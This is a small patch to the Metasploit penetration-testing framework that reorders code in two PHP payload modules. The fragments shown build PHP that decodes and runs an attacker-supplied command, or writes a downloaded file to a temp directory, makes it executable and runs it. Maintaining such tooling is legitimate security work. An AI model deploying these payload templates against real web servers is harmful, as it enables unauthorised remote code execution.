From ff20cf911caa11f5623e70fe9f0b0cc1eea8929e Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Thu, 2 Feb 2017 14:53:53 -0600
Subject: [PATCH] Move the preamble above all other code

---
 modules/payloads/singles/php/download_exec.rb | 2 +-
 modules/payloads/singles/php/exec.rb          | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb
index c0f5941236..e0faa3633f 100644
--- a/modules/payloads/singles/php/download_exec.rb
+++ b/modules/payloads/singles/php/download_exec.rb
@@ -40,6 +40,7 @@ module MetasploitModule
     exename = Rex::Text.rand_text_alpha(rand(8) + 4)
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble({:disabled_varname => dis})}
     if (!function_exists('sys_get_temp_dir')) {
       function sys_get_temp_dir() {
         if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
@@ -63,7 +64,6 @@ module MetasploitModule
     fclose($fd_out);
     chmod($fname, 0777);
     $c = $fname;
-    #{php_preamble({:disabled_varname => dis})}
     #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
     @unlink($fname);
     END_OF_PHP_CODE
diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb
index 09b07f6530..b6872d7aa1 100644
--- a/modules/payloads/singles/php/exec.rb
+++ b/modules/payloads/singles/php/exec.rb
@@ -37,9 +37,9 @@ module MetasploitModule
     cmd = Rex::Text.encode_base64(datastore['CMD'])
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble(disabled_varname: dis)}
     $c = base64_decode("#{cmd}");
-    #{php_preamble({:disabled_varname => dis})}
-    #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
+    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
     END_OF_PHP_CODE
 
     return Rex::Text.compress(shell)